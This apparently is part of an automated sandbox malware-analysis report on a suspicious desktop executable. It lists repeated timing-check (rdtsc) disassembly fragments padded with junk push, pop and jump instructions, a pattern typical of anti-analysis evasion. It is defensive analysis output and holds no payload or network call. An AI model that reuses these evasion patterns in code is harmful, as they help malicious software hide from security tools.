Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F4E30A second address: F4E30E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F4EB84 second address: F4EB8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F4EB8A second address: F4EB90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F4EB90 second address: F4EB96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F4EB96 second address: F4EBB6 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA030F107ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007FA030F107ABh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F4EBB6 second address: F4EBBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F4ECF2 second address: F4ECF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F4F147 second address: F4F158 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA030CAD66Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F5290E second address: F52912 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F56CC4 second address: F56CE3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jc 00007FA030CAD666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007FA030CAD66Fh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F55C89 second address: F55C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F1A500 second address: F1A506 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F1A506 second address: F1A53C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA030F107A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 5712086Ah 0x00000011 call 00007FA030F107A9h 0x00000016 pushad 0x00000017 pushad 0x00000018 jmp 00007FA030F107ADh 0x0000001d push esi 0x0000001e pop esi 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 jo 00007FA030F107A6h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F1A53C second address: F1A564 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnp 00007FA030CAD66Ah 0x0000000e push esi 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop esi 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push edi 0x00000017 push esi 0x00000018 push edi 0x00000019 pop edi 0x0000001a pop esi 0x0000001b pop edi 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 jl 00007FA030CAD668h 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F1A564 second address: F1A57E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA030F107A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007FA030F107A8h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F1A61A second address: F1A61E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F1A6C3 second address: F1A6CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F1A6CB second address: F1A6ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA030CAD666h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 jmp 00007FA030CAD671h 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F1A6ED second address: F1A6F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F1A6F3 second address: F1A6F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F1ADD2 second address: F1ADD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F1B072 second address: F1B077 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F1B077 second address: F1B098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA030F107B4h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F1B098 second address: F1B09E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F1B09E second address: F1B0A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F1B19E second address: F1B1A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F55F46 second address: F55F4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F560CF second address: F560D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F560D3 second address: F560D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F5664D second address: F56652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F56652 second address: F5665A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F568F1 second address: F56905 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA030CAD66Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F5B2E5 second address: F5B312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA030F107ACh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA030F107B8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F5B312 second address: F5B326 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD66Eh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F5B326 second address: F5B355 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030F107B8h 0x00000007 jmp 00007FA030F107AAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007FA030F107A6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F5B355 second address: F5B359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F5B359 second address: F5B36B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA030F107AAh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F60334 second address: F60350 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA030CAD678h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F60ABC second address: F60ADF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jp 00007FA030F107A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FA030F107B4h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F60D99 second address: F60D9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F60D9F second address: F60DA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F612F1 second address: F61321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007FA030CAD675h 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jnl 00007FA030CAD668h 0x00000018 push eax 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d pop eax 0x0000001e rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F61321 second address: F6132B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FA030F107A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F6132B second address: F61335 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA030CAD666h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F61335 second address: F6133E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F64D54 second address: F64D67 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FA030CAD66Bh 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F64D67 second address: F64D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F64EAB second address: F64EB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007FA030CAD666h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F66F4F second address: F66F5D instructions: 0x00000000 rdtsc 0x00000002 js 00007FA030F107A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F66F5D second address: F66F78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD677h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F6BC22 second address: F6BC28 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F6BC28 second address: F6BC79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD66Eh 0x00000007 jno 00007FA030CAD67Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007FA030CAD675h 0x00000017 jc 00007FA030CAD66Eh 0x0000001d push edi 0x0000001e pop edi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F6BC79 second address: F6BC7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F6B284 second address: F6B2A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FA030CAD66Dh 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jmp 00007FA030CAD66Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F6B2A7 second address: F6B2AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F6B2AD second address: F6B2B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F6B40A second address: F6B426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA030F107B4h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F6B7F4 second address: F6B813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FA030CAD677h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F6F30E second address: F6F312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F6F312 second address: F6F373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA030CAD666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d ja 00007FA030CAD666h 0x00000013 pushad 0x00000014 popad 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 pushad 0x00000019 jmp 00007FA030CAD679h 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007FA030CAD678h 0x00000025 popad 0x00000026 push ebx 0x00000027 jmp 00007FA030CAD671h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: ED5837 second address: ED583F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: ED583F second address: ED5843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: ED5843 second address: ED5863 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA030F107A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA030F107B2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: ED5863 second address: ED5867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F73B66 second address: F73B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FA030F107A6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F73B73 second address: F73B79 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F73B79 second address: F73B87 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F73B87 second address: F73B8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F73B8D second address: F73B93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F73D12 second address: F73D1C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA030CAD666h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F73D1C second address: F73D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jp 00007FA030F107A6h 0x00000011 js 00007FA030F107A6h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push ebx 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d pop ebx 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F73E7E second address: F73E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F73E82 second address: F73E88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F73E88 second address: F73E8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F73E8E second address: F73E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F73E92 second address: F73E9C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F73E9C second address: F73EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F73EA0 second address: F73EAE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F73EAE second address: F73EBE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 ja 00007FA030F107AEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F1ABBF second address: F1ABC9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA030CAD666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F1ABC9 second address: F1ABCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F1ACA9 second address: F1ACBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FA030CAD666h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F1ACBC second address: F1ACD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030F107B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F7452D second address: F74541 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD66Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F74541 second address: F74552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA030F107ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F74FB7 second address: F74FD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD677h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F74FD9 second address: F74FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F7A66B second address: F7A677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F7AFB3 second address: F7AFB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F7AFB9 second address: F7AFC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F7AFC6 second address: F7AFCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F7B221 second address: F7B25D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FA030CAD670h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007FA030CAD680h 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F7B524 second address: F7B583 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA030F107AAh 0x00000008 jmp 00007FA030F107B6h 0x0000000d jnp 00007FA030F107A6h 0x00000013 jmp 00007FA030F107ABh 0x00000018 popad 0x00000019 pushad 0x0000001a jmp 00007FA030F107B0h 0x0000001f jno 00007FA030F107A6h 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jnp 00007FA030F107A6h 0x00000032 jne 00007FA030F107A6h 0x00000038 rdtsc
